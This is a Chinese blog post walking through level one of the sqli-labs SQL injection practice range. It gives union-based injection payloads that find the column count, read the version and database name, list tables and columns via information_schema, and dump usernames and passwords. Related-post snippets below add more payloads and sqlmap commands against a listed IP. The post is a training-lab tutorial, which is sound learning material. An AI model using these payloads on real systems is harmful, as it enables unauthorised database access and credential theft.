SQl靶场第一关,傻子看了都会!

已于 2023-06-09 21:00:14 修改
阅读量110 收藏
点赞数
分类专栏: SQL注入靶场 文章标签: 数据库 sql
于 2023-06-09 20:58:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JINWANYOUYUE/article/details/131134778
版权

演示步骤

输入?id=1' order by 3--+

加单引号是为了之前的数据形成闭合,相同功能的符号还有很多比如[ ' " % ) ]

后缀加上--+和#是注释的意思 注释完 后边的数据就失去作用了

在闭合后边______ 注释前边输入自己的数据

.1.输入?id=1' order by 3--+ 进行字段拆解,检验被查询表存在的字段数量

2.输入?id=-1' union select 1,2,3--+查看一下显示位回显,发现2,3位可以输入内容

3.查询一下

数据库版本version()5.7.26

数据库名称database()security

输入?id=-1' union select 1,version(),database()--+

4.查询数据库的所有表名:emails,referers,uagents,users

?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+

5.查询表名下的列名:

id,email_id

id,referer,ip_address

id,uagent,ip_address,username

USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

6.查询列名下的数据

通过常识我们推测密码在 username 和 password 当中

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

拿到数据即可

一只会飞的pig
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【漏洞发现-sql注入】有回显注入--sqli-labs
m0_46344990的博客
05-16 954
一、漏洞描述 数据库是对用户数据进行存储以及删除等操作 ,功能是用来组织,存储和管理数据。比如我们网站每一个用户对应的用户名基本信息,账号密码等等,都在服务器用数据库保存。用户通过对网站的操作,请求返回给服务器,服务器将对应数据拿出来渲染在html中让用户使用。比如登录操作,输入账号密码后服务器查询响应账户的密码是否对应,这些都需要在后端语言中用到sql语句。而黑客们通过传入数据使原本的sql语句拼接了其他语句,执行了其他的操作。就sql-labs中的一些关卡的漏洞,这里先介绍有回显的注...
SQL注入之——Mysql+PHP手工获取webshell
温柔小薛的博客
04-04 1573
Mysql+PHP手工获取webshell 目录Mysql+PHP手工获取webshell一、使用 order by 查询字段二、使用联合查询来查询当前数据库、用户、版本信息等三、获取表名、字段、值四、Mysql root 用户密码存储位置五、对服务器文件进行读写操作六、怎么获取 Web 路径七、利用 sql 注入写入 webshell八、MysQL 获取 web 路径方法总结 只是大概流程,等梳...
SQL注入18】Sqli-labs靶场1~10关思路解析及思考总结——针对GET请求的注入思路
Fighting_hawk的博客
05-11 4341
1. 本文从SQLi-labs前10关出发,总结各个关卡通关过程的思路。 2. 涵盖了联合查询注入、报错注入、布尔盲注和延时盲注四种基本类型。 3. 对比分析了不同参数测试时的用意,以便明确我们的注入思路。 4. 这些关卡暂未对输入参数进行过滤,对于采用了保护措施的程序,基本思路正确,也是有可能注入不了的。 .........
sqli_labs闯关
weixin_45808483的博客
10-27 488
less-1 http://127.0.0.1/sqli-labs/Less-1/?id=1 // 加单引号,查看是否有注入 http://127.0.0.1/sqli-labs/Less-1/?id=1' //查看有多少列 http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ // 使id=-1报错,使用联合查找查看那些数据可以回显 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union
如何使用sqlmap破解封神台靶场第一关
weixin_44490353的博客
12-17 1584
文章目录一.查看是否有注入二.查找当前数据库三.查询数据库的表四.查询表中的列五.查询具体内容 一.查看是否有注入 使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch -u指令为查看网址的url是否有漏洞。-batch为永远不要求用户输入信息,默认执行。 我们可以看到,存在sql注入漏洞。 二.查找当前数据库 mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch -cuurent
一个可以检测pakachu靶场漏洞和SQL靶场的程序
02-21
一个可以爬取网站信息,检测pakachu靶场漏洞和SQL靶场的程序,其中利用到了构造相关payload的方法,同时可以导出检测文件有相关问题链接的表格文件,作为报告,相当于一个漏洞检测软件,可以用来学习,主要还是定向...
sql注入#sql靶场
11-02
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或验证用户输入的数据,导致恶意SQL代码可以被嵌入到查询中并被执行。SQL靶场通常是指用于安全培训、测试和研究SQL注入攻击的环境,它可以帮助开发者...
SQL靶场资源包,搭建靶场需要
最新发布
05-16
SQL靶场通常由一系列具有不同安全漏洞的Web应用程序组成,这些漏洞允许用户通过输入恶意SQL语句来测试和利用系统。这样的资源包对于网络安全专业人员、开发人员以及对网络安全感兴趣的初学者来说,是提高SQL安全技能...
sql注入靶场.zip
06-24
这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者了解、实践和防御SQL注入攻击。靶场通常由一系列逐步增加难度的挑战组成,让学习者通过实际操作来提升自己的安全技能。 靶场的...
SQL注入实验第一关.docx
07-04
SQL注入实验,其中的实验数据库是基于MySQL数据库,针对常见的SQL注入语句的操作。
sqli less-02
ANYOUZHEN的博客
04-30 376
输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+ 输入id=1'--+仍然报错 其是整型(id=$id limit 0,1),然后不加单引号 猜测成功,我们用常规sql思路走走 ?id=1 order by 3--+ 我们发现表格只有3列 我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+ 接着查询数据库?id=-1 union select 1,2,database()--+ ...
sqli-labs闯关1~4
qq_45927819的博客
08-06 329
LESS–1(错误型GET单引号字符型注入) 1.测试闭合符号; 输入 ?id=1 界面正常,输入?id=1’ 界面报错,那么就存在sql注入漏洞。 2.判断列数; 输入 ?id=1’ order by 3 --+ 显示正常 输入 ?id=1’ order by 4 --+ 报错了,如下图: 所以得出这个表列数有3个。 3.联合查询爆数据库 union注入开始: ?id=-1’ union select 1,2,3 --+   得到数据库security : ?id=-1’ union select
SQL注入学习总结
YouthBelief的博客
10-09 4600
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5569
SQL注入环境搭建及多种注入类型测试实验
3. 排序 ORDER BY
oYeYuanXinZhiZhu1的专栏
01-16 595
1.普通排序  :关键字 ORDER BY SELECT 列名 FROM 表名 ORDER BY 列名;2.多个列排序: SELECT 列名1,列名2,.... FROM 表名 ORDER BY 列名3,列名4;先按列名3排序,若出现相同行,再按列名4排序,以此类推3.指定排序方向: 由于默认按升序排序,若要降序,则使用关键字,DESC 例按价格降序排列(最贵的排在前面
SQL注入之布尔型盲注
技术超强的网络安全平台
12-02 1495
SQL注入之布尔型盲注 1.布尔型盲注 布尔型盲注应用于无数据回显,且WEB页面无报错信息的情况,此时不能通过报错型注入的方法来爆出数据,布尔型盲注的WEB页面只有两种回显结果,正确的页面以及错误的页面,且错误的页面无报错提示语句,正确的页面不能输出数据。 2.函数 盲注,其注入就是通过函数的执行结果来猜测数据 Leng...
Mysql注入总结(一)
weixin_33798152的博客
08-07 260
先来看看瞌睡龙的科普文章默认存在的数据库:mysql需要root权限读取information_schema在5以上的版本中存在测试是否存在注入方法假:表示查询是错误的 (MySQL 报错/返回页面与原来不同)真:表示查询是正常的 (返回页面与原来相同)共三种情况:字符串类型查询时:数字类型查询时:登陆时:'假''真"假""真\假\\真AND 1真AND 0假AND true...
Mysql - ORDER BY详解
weixin_33969116的博客
08-13 1733
0 索引 1 概述 2 索引扫描排序和文件排序简介 3 索引扫描排序执行过程分析 4 文件排序 5 补充说明 6 参考资料 1 概述 MySQL有两种方式可以实现ORDER BY: 1.通过索引扫描生成有序的结果 2.使用文件排序(filesort) 围绕着这两种排序方式,我们试着理解一下ORDER BY的执行过程以及回答一些常...
order by排序的用法
热门推荐
悦分享
09-21 11万+
一、order by 1 其实1表示第一个栏位,2表示第二栏位; 依此类推,当表中只有2个栏位时,oder by 3就出错,这个跟order by 列名没有什么区别,不过在特殊情况下还是很有用的. select owner,table_name,tablespace_name,blocks,last_analyzed from all_tables order by ...
sqlmap跑sqli-labs靶场第一关
01-06
以下是使用sqlmap跑sqli-labs靶场第一关的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值